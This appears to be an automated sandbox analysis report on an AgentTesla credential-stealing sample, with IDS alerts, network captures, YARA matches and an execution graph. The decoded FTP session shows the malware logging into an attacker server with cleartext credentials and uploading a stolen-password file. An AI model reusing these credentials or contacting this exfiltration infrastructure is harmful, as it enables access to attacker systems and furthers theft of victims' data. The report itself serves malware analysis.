                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-11T04:31:40.469948+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.649710195.252.110.25321TCP
                                                      2025-01-11T04:31:41.053633+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.649712195.252.110.25358243TCP
                                                      2025-01-11T04:31:41.058985+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.649712195.252.110.25358243TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 11, 2025 04:31:37.289016008 CET4970980192.168.2.6208.95.112.1
                                                      Jan 11, 2025 04:31:37.293847084 CET8049709208.95.112.1192.168.2.6
                                                      Jan 11, 2025 04:31:37.293927908 CET4970980192.168.2.6208.95.112.1
                                                      Jan 11, 2025 04:31:37.295103073 CET4970980192.168.2.6208.95.112.1
                                                      Jan 11, 2025 04:31:37.300218105 CET8049709208.95.112.1192.168.2.6
                                                      Jan 11, 2025 04:31:37.777339935 CET8049709208.95.112.1192.168.2.6
                                                      Jan 11, 2025 04:31:37.820441008 CET4970980192.168.2.6208.95.112.1
                                                      Jan 11, 2025 04:31:38.529095888 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:38.533977985 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:38.534073114 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:39.144181967 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.144623995 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:39.149410009 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.350522995 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.350708008 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:39.355529070 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.638859987 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.641319990 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:39.646109104 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.846981049 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:39.847142935 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:39.852020025 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.052690983 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.053028107 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:40.057801962 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.258253098 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.258423090 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:40.263375044 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.464149952 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.464884043 CET4971258243192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:40.469758034 CET5824349712195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:40.469819069 CET4971258243192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:40.469948053 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:40.474767923 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:41.052661896 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:41.053632975 CET4971258243192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:41.053730011 CET4971258243192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:41.058609962 CET5824349712195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:41.058912992 CET5824349712195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:41.058984995 CET4971258243192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:41.101665020 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:31:41.259819031 CET2149710195.252.110.253192.168.2.6
                                                      Jan 11, 2025 04:31:41.320332050 CET4971021192.168.2.6195.252.110.253
                                                      Jan 11, 2025 04:32:28.445807934 CET4970980192.168.2.6208.95.112.1
                                                      Jan 11, 2025 04:32:28.451198101 CET8049709208.95.112.1192.168.2.6
                                                      Jan 11, 2025 04:32:28.451296091 CET4970980192.168.2.6208.95.112.1
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 11, 2025 04:31:37.275753975 CET5976053192.168.2.61.1.1.1
                                                      Jan 11, 2025 04:31:37.282857895 CET53597601.1.1.1192.168.2.6
                                                      Jan 11, 2025 04:31:38.440248966 CET5448053192.168.2.61.1.1.1
                                                      Jan 11, 2025 04:31:38.528150082 CET53544801.1.1.1192.168.2.6
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 11, 2025 04:31:37.275753975 CET192.168.2.61.1.1.10xc5ecStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                      Jan 11, 2025 04:31:38.440248966 CET192.168.2.61.1.1.10x542dStandard query (0)ftp.jeepcommerce.rsA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 11, 2025 04:31:37.282857895 CET1.1.1.1192.168.2.60xc5ecNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                      Jan 11, 2025 04:31:38.528150082 CET1.1.1.1192.168.2.60x542dNo error (0)ftp.jeepcommerce.rs195.252.110.253A (IP address)IN (0x0001)false
                                                      • ip-api.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649709208.95.112.1804364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 11, 2025 04:31:37.295103073 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                      Host: ip-api.com
                                                      Connection: Keep-Alive
                                                      Jan 11, 2025 04:31:37.777339935 CET175INHTTP/1.1 200 OK
                                                      Date: Sat, 11 Jan 2025 03:31:37 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 6
                                                      Access-Control-Allow-Origin: *
                                                      X-Ttl: 60
                                                      X-Rl: 44
                                                      Data Raw: 66 61 6c 73 65 0a
                                                      Data Ascii: false


                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Jan 11, 2025 04:31:39.144181967 CET2149710195.252.110.253192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.220-This is a private system - No anonymous login
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                      Jan 11, 2025 04:31:39.144623995 CET4971021192.168.2.6195.252.110.253USER w133y@jeepcommerce.rs
                                                      Jan 11, 2025 04:31:39.350522995 CET2149710195.252.110.253192.168.2.6331 User w133y@jeepcommerce.rs OK. Password required
                                                      Jan 11, 2025 04:31:39.350708008 CET4971021192.168.2.6195.252.110.253PASS Q6]7rLSD*gU2
                                                      Jan 11, 2025 04:31:39.638859987 CET2149710195.252.110.253192.168.2.6230 OK. Current restricted directory is /
                                                      Jan 11, 2025 04:31:39.846981049 CET2149710195.252.110.253192.168.2.6504 Unknown command
                                                      Jan 11, 2025 04:31:39.847142935 CET4971021192.168.2.6195.252.110.253PWD
                                                      Jan 11, 2025 04:31:40.052690983 CET2149710195.252.110.253192.168.2.6257 "/" is your current location
                                                      Jan 11, 2025 04:31:40.053028107 CET4971021192.168.2.6195.252.110.253TYPE I
                                                      Jan 11, 2025 04:31:40.258253098 CET2149710195.252.110.253192.168.2.6200 TYPE is now 8-bit binary
                                                      Jan 11, 2025 04:31:40.258423090 CET4971021192.168.2.6195.252.110.253PASV
                                                      Jan 11, 2025 04:31:40.464149952 CET2149710195.252.110.253192.168.2.6227 Entering Passive Mode (195,252,110,253,227,131)
                                                      Jan 11, 2025 04:31:40.469948053 CET4971021192.168.2.6195.252.110.253STOR PW_user-928100_2025_01_10_22_31_37.html
                                                      Jan 11, 2025 04:31:41.052661896 CET2149710195.252.110.253192.168.2.6150 Accepted data connection
                                                      Jan 11, 2025 04:31:41.259819031 CET2149710195.252.110.253192.168.2.6226-File successfully transferred
                                                      226-File successfully transferred226 0.207 seconds (measured here), 1.52 Kbytes per second

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:22:31:33
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\Q5QrxfKnFA.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Q5QrxfKnFA.exe"
                                                      Imagebase:0x340000
                                                      File size:1'073'664 bytes
                                                      MD5 hash:F3DC9B8005C8237C3AD3A186AF2A6ADE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:22:31:34
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Q5QrxfKnFA.exe"
                                                      Imagebase:0x690000
                                                      File size:45'984 bytes
                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4590853406.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.6%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:7.9%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:185
                                                        execution_graph 101008 367c56 101009 367c62 __fcloseall 101008->101009 101045 369e08 GetStartupInfoW 101009->101045 101011 367c67 101047 368b7c GetProcessHeap 101011->101047 101013 367cbf 101014 367cca 101013->101014 101130 367da6 58 API calls 3 library calls 101013->101130 101048 369ae6 101014->101048 101017 367cd0 101018 367cdb __RTC_Initialize 101017->101018 101131 367da6 58 API calls 3 library calls 101017->101131 101069 36d5d2 101018->101069 101021 367cea 101022 367cf6 GetCommandLineW 101021->101022 101132 367da6 58 API calls 3 library calls 101021->101132 101088 374f23 GetEnvironmentStringsW 101022->101088 101025 367cf5 101025->101022 101028 367d10 101029 367d1b 101028->101029 101133 3630b5 58 API calls 3 library calls 101028->101133 101098 374d58 101029->101098 101032 367d21 101033 367d2c 101032->101033 101134 3630b5 58 API calls 3 library calls 101032->101134 101112 3630ef 101033->101112 101036 367d34 101037 367d3f __wwincmdln 101036->101037 101135 3630b5 58 API calls 3 library calls 101036->101135 101118 3447d0 101037->101118 101040 367d53 101041 367d62 101040->101041 101136 363358 58 API calls _doexit 101040->101136 101137 3630e0 58 API calls _doexit 101041->101137 101044 367d67 __fcloseall 101046 369e1e 101045->101046 101046->101011 101047->101013 101138 363187 36 API calls 2 library calls 101048->101138 101050 369aeb 101139 369d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 101050->101139 101052 369af0 101053 369af4 101052->101053 101141 369d8a TlsAlloc 101052->101141 101140 369b5c 61 API calls 2 library calls 101053->101140 101056 369af9 101056->101017 101057 369b06 101057->101053 101058 369b11 101057->101058 101142 3687d5 101058->101142 101061 369b53 101150 369b5c 61 API calls 2 library calls 101061->101150 101064 369b32 101064->101061 101066 369b38 101064->101066 101065 369b58 101065->101017 101149 369a33 58 API calls 4 library calls 101066->101149 101068 369b40 GetCurrentThreadId 101068->101017 101070 36d5de __fcloseall 101069->101070 101162 369c0b 101070->101162 101072 36d5e5 101073 3687d5 __calloc_crt 58 API calls 101072->101073 101074 36d5f6 101073->101074 101075 36d661 GetStartupInfoW 101074->101075 101076 36d601 __fcloseall @_EH4_CallFilterFunc@8 101074->101076 101082 36d676 101075->101082 101085 36d7a5 101075->101085 101076->101021 101077 36d86d 101171 36d87d LeaveCriticalSection _doexit 101077->101171 101079 3687d5 __calloc_crt 58 API calls 101079->101082 101080 36d7f2 GetStdHandle 101080->101085 101081 36d805 GetFileType 101081->101085 101082->101079 101083 36d6c4 101082->101083 101082->101085 101084 36d6f8 GetFileType 101083->101084 101083->101085 101169 369e2b InitializeCriticalSectionAndSpinCount 101083->101169 101084->101083 101085->101077 101085->101080 101085->101081 101170 369e2b InitializeCriticalSectionAndSpinCount 101085->101170 101089 374f34 101088->101089 101090 367d06 101088->101090 101211 36881d 58 API calls 2 library calls 101089->101211 101094 374b1b GetModuleFileNameW 101090->101094 101092 374f5a _memmove 101093 374f70 FreeEnvironmentStringsW 101092->101093 101093->101090 101095 374b4f _wparse_cmdline 101094->101095 101097 374b8f _wparse_cmdline 101095->101097 101212 36881d 58 API calls 2 library calls 101095->101212 101097->101028 101099 374d71 __wsetenvp 101098->101099 101100 374d69 101098->101100 101101 3687d5 __calloc_crt 58 API calls 101099->101101 101100->101032 101104 374d9a __wsetenvp 101101->101104 101102 374df1 101103 362d55 _free 58 API calls 101102->101103 101103->101100 101104->101100 101104->101102 101105 3687d5 __calloc_crt 58 API calls 101104->101105 101106 374e16 101104->101106 101109 374e2d 101104->101109 101213 374607 58 API calls 2 library calls 101104->101213 101105->101104 101107 362d55 _free 58 API calls 101106->101107 101107->101100 101214 368dc6 IsProcessorFeaturePresent 101109->101214 101111 374e39 101111->101032 101113 3630fb __IsNonwritableInCurrentImage 101112->101113 101237 36a4d1 101113->101237 101115 363119 __initterm_e 101117 363138 __cinit __IsNonwritableInCurrentImage 101115->101117 101240 362d40 101115->101240 101117->101036 101119 344889 101118->101119 101120 3447ea 101118->101120 101119->101040 101121 344824 IsThemeActive 101120->101121 101275 36336c 101121->101275 101125 344850 101287 3448fd SystemParametersInfoW SystemParametersInfoW 101125->101287 101127 34485c 101288 343b3a 101127->101288 101129 344864 SystemParametersInfoW 101129->101119 101130->101014 101131->101018 101132->101025 101136->101041 101137->101044 101138->101050 101139->101052 101140->101056 101141->101057 101145 3687dc 101142->101145 101144 368817 101144->101061 101148 369de6 TlsSetValue 101144->101148 101145->101144 101147 3687fa 101145->101147 101151 3751f6 101145->101151 101147->101144 101147->101145 101159 36a132 Sleep 101147->101159 101148->101064 101149->101068 101150->101065 101152 375201 101151->101152 101156 37521c 101151->101156 101153 37520d 101152->101153 101152->101156 101160 368b28 58 API calls __getptd_noexit 101153->101160 101155 37522c RtlAllocateHeap 101155->101156 101157 375212 101155->101157 101156->101155 101156->101157 101161 3633a1 DecodePointer 101156->101161 101157->101145 101159->101147 101160->101157 101161->101156 101163 369c2f EnterCriticalSection 101162->101163 101164 369c1c 101162->101164 101163->101072 101172 369c93 101164->101172 101166 369c22 101166->101163 101196 3630b5 58 API calls 3 library calls 101166->101196 101169->101083 101170->101085 101171->101076 101173 369c9f __fcloseall 101172->101173 101174 369cc0 101173->101174 101175 369ca8 101173->101175 101183 369ce1 __fcloseall 101174->101183 101200 36881d 58 API calls 2 library calls 101174->101200 101197 36a16b 58 API calls __NMSG_WRITE 101175->101197 101178 369cad 101198 36a1c8 58 API calls 6 library calls 101178->101198 101179 369cd5 101181 369cdc 101179->101181 101182 369ceb 101179->101182 101201 368b28 58 API calls __getptd_noexit 101181->101201 101186 369c0b __lock 58 API calls 101182->101186 101183->101166 101184 369cb4 101199 36309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101184->101199 101189 369cf2 101186->101189 101190 369d17 101189->101190 101191 369cff 101189->101191 101203 362d55 101190->101203 101202 369e2b InitializeCriticalSectionAndSpinCount 101191->101202 101194 369d0b 101209 369d33 LeaveCriticalSection _doexit 101194->101209 101197->101178 101198->101184 101200->101179 101201->101183 101202->101194 101204 362d5e RtlFreeHeap 101203->101204 101205 362d87 _free 101203->101205 101204->101205 101206 362d73 101204->101206 101205->101194 101210 368b28 58 API calls __getptd_noexit 101206->101210 101208 362d79 GetLastError 101208->101205 101209->101183 101210->101208 101211->101092 101212->101097 101213->101104 101215 368dd1 101214->101215 101220 368c59 101215->101220 101219 368dec 101219->101111 101221 368c73 _memset ___raise_securityfailure 101220->101221 101222 368c93 IsDebuggerPresent 101221->101222 101228 36a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101222->101228 101225 368d57 ___raise_securityfailure 101229 36c5f6 101225->101229 101226 368d7a 101227 36a140 GetCurrentProcess TerminateProcess 101226->101227 101227->101219 101228->101225 101230 36c600 IsProcessorFeaturePresent 101229->101230 101231 36c5fe 101229->101231 101233 37590a 101230->101233 101231->101226 101236 3758b9 5 API calls ___raise_securityfailure 101233->101236 101235 3759ed 101235->101226 101236->101235 101238 36a4d4 EncodePointer 101237->101238 101238->101238 101239 36a4ee 101238->101239 101239->101115 101243 362c44 101240->101243 101242 362d4b 101242->101117 101244 362c50 __fcloseall 101243->101244 101251 363217 101244->101251 101250 362c77 __fcloseall 101250->101242 101252 369c0b __lock 58 API calls 101251->101252 101253 362c59 101252->101253 101254 362c88 DecodePointer DecodePointer 101253->101254 101255 362c65 101254->101255 101256 362cb5 101254->101256 101265 362c82 101255->101265 101256->101255 101268 3687a4 59 API calls 2 library calls 101256->101268 101258 362d18 EncodePointer EncodePointer 101258->101255 101259 362cc7 101259->101258 101260 362cec 101259->101260 101269 368864 61 API calls 2 library calls 101259->101269 101260->101255 101264 362d06 EncodePointer 101260->101264 101270 368864 61 API calls 2 library calls 101260->101270 101263 362d00 101263->101255 101263->101264 101264->101258 101271 363220 101265->101271 101268->101259 101269->101260 101270->101263 101274 369d75 LeaveCriticalSection 101271->101274 101273 362c87 101273->101250 101274->101273 101276 369c0b __lock 58 API calls 101275->101276 101277 363377 DecodePointer EncodePointer 101276->101277 101340 369d75 LeaveCriticalSection 101277->101340 101279 344849 101280 3633d4 101279->101280 101281 3633de 101280->101281 101282 3633f8 101280->101282 101281->101282 101341 368b28 58 API calls __getptd_noexit 101281->101341 101282->101125 101284 3633e8 101342 368db6 9 API calls ___strgtold12_l 101284->101342 101286 3633f3 101286->101125 101287->101127 101289 343b47 __ftell_nolock 101288->101289 101343 347667 101289->101343 101293 343b7a IsDebuggerPresent 101294 37d272 MessageBoxA 101293->101294 101295 343b88 101293->101295 101296 37d28c 101294->101296 101295->101296 101297 343ba5 101295->101297 101327 343c61 101295->101327 101567 347213 59 API calls Mailbox 101296->101567 101429 347285 101297->101429 101298 343c68 SetCurrentDirectoryW 101302 343c75 Mailbox 101298->101302 101302->101129 101303 343bc3 GetFullPathNameW 101445 347bcc 101303->101445 101304 37d29c 101307 37d2b2 SetCurrentDirectoryW 101304->101307 101306 343bfe 101454 35092d 101306->101454 101307->101302 101310 343c1c 101311 343c26 101310->101311 101568 39874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101310->101568 101470 343a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101311->101470 101314 37d2cf 101314->101311 101318 37d2e0 101314->101318 101317 343c30 101319 343c43 101317->101319 101478 34434a 101317->101478 101569 344706 101318->101569 101489 3509d0 101319->101489 101323 37d2e8 101576 347de1 101323->101576 101325 343c4e 101325->101327 101566 34443a Shell_NotifyIconW _memset 101325->101566 101326 37d2f5 101328 37d324 101326->101328 101329 37d2ff 101326->101329 101327->101298 101332 347cab 59 API calls 101328->101332 101580 347cab 101329->101580 101340->101279 101341->101284 101342->101286 101596 360db6 101343->101596 101345 347688 101346 360db6 Mailbox 59 API calls 101345->101346 101347 343b51 GetCurrentDirectoryW 101346->101347 101348 343766 101347->101348 101349 347667 59 API calls 101348->101349 101350 34377c 101349->101350 101634 343d31 101350->101634 101352 34379a 101353 344706 61 API calls 101352->101353 101354 3437ae 101353->101354 101355 347de1 59 API calls 101354->101355 101356 3437bb 101355->101356 101648 344ddd 101356->101648 101359 37d173 101719 3a955b 101359->101719 101360 3437dc Mailbox 101672 348047 101360->101672 101364 37d192 101366 362d55 _free 58 API calls 101364->101366 101368 37d19f 101366->101368 101370 344e4a 84 API calls 101368->101370 101374 37d1a8 101370->101374 101372 347de1 59 API calls 101373 343808 101372->101373 101679 3484c0 101373->101679 101376 343ed0 59 API calls 101374->101376 101378 37d1c3 101376->101378 101377 34381a Mailbox 101379 347de1 59 API calls 101377->101379 101380 343ed0 59 API calls 101378->101380 101381 343840 101379->101381 101383 37d1df 101380->101383 101382 3484c0 69 API calls 101381->101382 101386 34384f Mailbox 101382->101386 101384 344706 61 API calls 101383->101384 101385 37d204 101384->101385 101387 343ed0 59 API calls 101385->101387 101389 347667 59 API calls 101386->101389 101388 37d210 101387->101388 101390 348047 59 API calls 101388->101390 101391 34386d 101389->101391 101392 37d21e 101390->101392 101683 343ed0 101391->101683 101394 343ed0 59 API calls 101392->101394 101396 37d22d 101394->101396 101402 348047 59 API calls 101396->101402 101398 343887 101398->101374 101399 343891 101398->101399 101400 362efd _W_store_winword 60 API calls 101399->101400 101401 34389c 101400->101401 101401->101378 101403 3438a6 101401->101403 101405 37d24f 101402->101405 101404 362efd _W_store_winword 60 API calls 101403->101404 101407 3438b1 101404->101407 101406 343ed0 59 API calls 101405->101406 101408 37d25c 101406->101408 101407->101383 101409 3438bb 101407->101409 101408->101408 101410 362efd _W_store_winword 60 API calls 101409->101410 101411 3438c6 101410->101411 101411->101396 101412 343907 101411->101412 101414 343ed0 59 API calls 101411->101414 101412->101396 101413 343914 101412->101413 101699 3492ce 101413->101699 101415 3438ea 101414->101415 101418 348047 59 API calls 101415->101418 101420 3438f8 101418->101420 101422 343ed0 59 API calls 101420->101422 101422->101412 101424 34928a 59 API calls 101426 34394f 101424->101426 101425 348ee0 60 API calls 101425->101426 101426->101424 101426->101425 101427 343ed0 59 API calls 101426->101427 101428 343995 Mailbox 101426->101428 101427->101426 101428->101293 101430 347292 __ftell_nolock 101429->101430 101431 37ea22 _memset 101430->101431 101432 3472ab 101430->101432 101434 37ea3e GetOpenFileNameW 101431->101434 102603 344750 101432->102603 101437 37ea8d 101434->101437 101439 347bcc 59 API calls 101437->101439 101441 37eaa2 101439->101441 101441->101441 101442 3472c9 102631 34686a 101442->102631 101446 347c45 101445->101446 101447 347bd8 __wsetenvp 101445->101447 101448 347d2c 59 API calls 101446->101448 101449 347c13 101447->101449 101450 347bee 101447->101450 101453 347bf6 _memmove 101448->101453 101452 348029 59 API calls 101449->101452 102890 347f27 59 API calls Mailbox 101450->102890 101452->101453 101453->101306 101455 35093a __ftell_nolock 101454->101455 102891 346d80 101455->102891 101457 35093f 101469 343c14 101457->101469 102902 35119e 89 API calls 101457->102902 101459 35094c 101459->101469 102903 353ee7 91 API calls Mailbox 101459->102903 101461 350955 101462 350959 GetFullPathNameW 101461->101462 101461->101469 101463 347bcc 59 API calls 101462->101463 101464 350985 101463->101464 101465 347bcc 59 API calls 101464->101465 101466 350992 101465->101466 101467 347bcc 59 API calls 101466->101467 101468 384cab _wcscat 101466->101468 101467->101469 101469->101304 101469->101310 101471 343ab0 LoadImageW RegisterClassExW 101470->101471 101472 37d261 101470->101472 102945 343041 7 API calls 101471->102945 102946 3447a0 LoadImageW EnumResourceNamesW 101472->102946 101475 343b34 101477 3439d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101475->101477 101476 37d26a 101477->101317 101479 344375 _memset 101478->101479 102947 344182 101479->102947 101482 3443fa 101484 344414 Shell_NotifyIconW 101482->101484 101485 344430 Shell_NotifyIconW 101482->101485 101486 344422 101484->101486 101485->101486 102951 34407c 101486->102951 101488 344429 101488->101319 101490 384cc3 101489->101490 101502 3509f5 101489->101502 103109 3a9e4a 89 API calls 4 library calls 101490->103109 101492 350cfa 101492->101325 101495 350ee4 101495->101492 101497 350ef1 101495->101497 101496 350a4b PeekMessageW 101565 350a05 Mailbox 101496->101565 103107 351093 331 API calls Mailbox 101497->103107 101500 350ef8 LockWindowUpdate DestroyWindow GetMessageW 101500->101492 101501 350ce4 101501->101492 103106 351070 10 API calls Mailbox 101501->103106 101502->101565 103110 349e5d 60 API calls 101502->103110 103111 396349 331 API calls 101502->103111 101503 384e81 Sleep 101503->101565 101508 384d50 TranslateAcceleratorW 101511 350e43 PeekMessageW 101508->101511 101508->101565 101509 349e5d 60 API calls 101509->101565 101510 350ea5 TranslateMessage DispatchMessageW 101510->101511 101511->101565 101512 38581f WaitForSingleObject 101516 38583c GetExitCodeProcess CloseHandle 101512->101516 101512->101565 101514 360db6 59 API calls Mailbox 101514->101565 101515 350d13 timeGetTime 101515->101565 101550 350f95 101516->101550 101517 350e5f Sleep 101549 350e70 Mailbox 101517->101549 101518 348047 59 API calls 101518->101565 101519 347667 59 API calls 101519->101549 101520 385af8 Sleep 101520->101549 101523 36049f timeGetTime 101523->101549 101524 350f4e timeGetTime 103108 349e5d 60 API calls 101524->103108 101527 385b8f GetExitCodeProcess 101530 385bbb CloseHandle 101527->101530 101531 385ba5 WaitForSingleObject 101527->101531 101529 34b7dd 109 API calls 101529->101549 101530->101549 101531->101530 101531->101565 101534 3c5f25 110 API calls 101534->101549 101535 385874 101535->101550 101536 385078 Sleep 101536->101565 101537 385c17 Sleep 101537->101565 101539 347de1 59 API calls 101539->101549 101543 349ea0 304 API calls 101543->101565 101549->101519 101549->101523 101549->101527 101549->101529 101549->101534 101549->101535 101549->101536 101549->101537 